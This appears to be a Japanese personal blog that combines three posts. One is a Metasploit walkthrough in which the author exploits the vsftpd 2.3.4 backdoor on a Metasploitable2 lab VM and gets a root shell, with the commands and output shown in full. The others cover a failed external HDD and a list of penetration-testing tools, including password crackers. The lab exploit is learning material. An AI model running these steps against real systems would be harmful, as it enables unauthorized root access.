Metasploitを試してみる
前回のペネトレーションテストの続きとしてMetasploitを試してみます。
事前準備
Kali Linuxをインストールします。
Official Kali Linux Downloads | Kali Linux
Metasploitの攻撃対象となるLinuxを立ち上げておきます。
Metasploitable - Browse /Metasploitable2 at SourceForge.net
Metasploitの起動
Kali Linux上でTerminalを起動し、以下のコマンドでMetasploitを起動します。
root@kali:~# msfconsole Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro Learn more on http://rapid7.com/metasploit =[ metasploit v4.14.10-dev ] + -- --=[ 1639 exploits - 944 auxiliary - 289 post ] + -- --=[ 472 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
vsftpdの脆弱性をついたroot権限の取得
vsftpdのExploitを検索してみます。
root@kali:~# search vsftpd [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
攻撃するために必要な情報を設定します。
msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port (TCP)
攻撃対象のIPアドレスをRHOSTに設定します。
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.0.5 RHOST => 192.168.0.5
再度、optionsを表示してRHOSTが設定されていることを確認。
msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.0.5 yes The target address RPORT 21 yes The target port (TCP)
攻撃をしてみます。
msf exploit(vsftpd_234_backdoor) > run [*] 192.168.0.5:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.0.5:21 - USER: 331 Please specify the password. [+] 192.168.0.5:21 - Backdoor service has been spawned, handling... [+] 192.168.0.5:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 2 opened (192.168.0.7:41265 -> 192.168.0.5:6200) at 2017-07-17 10:35:37 -0400
id
コマンドを叩くとroot権限が取得できていることがわかります。
id uid=0(root) gid=0(root)
こんなに簡単にroot権限が取得できるとは・・・。
これから色々と弄っていきます。
参考
サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考
- 作者: Justin Seitz,青木一史,新井悠,一瀬小夜,岩村誠,川古谷裕平,星澤裕二
- 出版社/メーカー: オライリージャパン
- 発売日: 2015/10/24
- メディア: 単行本(ソフトカバー)
- この商品を含むブログ (11件) を見る
外付けHDDが壊れました・・・
昨日、外付けHDDがMacで認識しなくなったので、修復作業を行ってました。
認識しなくなった経緯としては、MacのTime Machine用に外付けHDDを使っていたのですが、そもそもバックアップから復元する機会がなく、外付けHDDを他のことに使おうと思い立ちました。他にも写真や音楽なども入っていたのでフォーマットはせずにファイルを選択して削除していきました。
ところが、ゴミ箱からファイルを削除しようとしても一向に削除が終わりません。2時間以上経っても終わりません。
一旦諦めて、.Trashes
の中を直接rm
で削除しました。ただ、こちらも終わらないので途中でキャンセルしました。
そうしたら、外付けHDDがFinder上に表示されなくなりました。
Macのシステムレポート上のUSBでは認識されているようなのですが・・・。
ディスクユーティリティから修復を試みましたが、ディスクを読み込み中
のまま中々ディスクが表示されません。
もう諦めかけたとき、fsckコマンドの存在を知りました。
さっそく、Command+SでMacをシングルユーザモードで起動して/sbin/fsck -fy /dev/disk2s2
で修復を試みました。
こちらの記事を見ると私が使用している2TBのUSB2.0では18時間かかるとのことで、夜に仕掛けて無事に修復されることを祈りながら眠りにつきました。
USB2.0ストレージHDD 2TBのfsck所要時間 | nexia inc
朝起きてみると、まだ修復は終わってませんでしたが、修復されてそうなログがちらほら出力されていたので、安心して会社に行きました。
ところが、家に帰ってみると外付けHDDからブー、ブーと異音が鳴り響いていました。
本日の雷雨で停電したっぽいですorz
今までの思い出の写真や音楽は全て無になりましたorz
本日の教訓はRAIDを組みましょう!です。
ペネトレーションテスト
最近、社内でセキュリティ関連の話題が多いので「ハッカーの学校」を読みました。 けっこー知らないツールが載っていて、予想以上に楽しめる内容でした。 その中でも私が特に気になったツールがこちらです。
Kali Linux
ペネトレーション用の様々なツールが最初からインストールされているLinuxになります。 公式サイトからVirtual Box等のイメージをダウンロードできるので手軽に試すことができます。
Zenmap
サーバのポートをスキャンするツールです。 開放されているポートを調べることができます。
Zenmap - Official cross-platform Nmap Security Scanner GUI
Hydra(ヒュドラ)
オンライン向けのパスワードクラッカーツールです。
THC Hydra – SecTools Top Network Security Tools
Cain & Abel
オフライン向けのパスワードクラッカーツールです。
NetCraft
URLから様々な情報を確認できるサイトです。 OS、言語、フレームワーク等の情報が見れます。
Netcraft | Internet Research, Anti-Phishing and PCI Security Services
Metasploit
デファクト?のペネトレーションテストツールです。 GUI版はArmitageです。
Penetration Testing Software | Metasploit
NetCat
The GNU Netcat -- Official homepage
なお、弄る際は自己責任で。
- 作者: IPUSIRON
- 出版社/メーカー: データ・ハウス
- 発売日: 2015/01/23
- メディア: 単行本(ソフトカバー)
- この商品を含むブログ (2件) を見る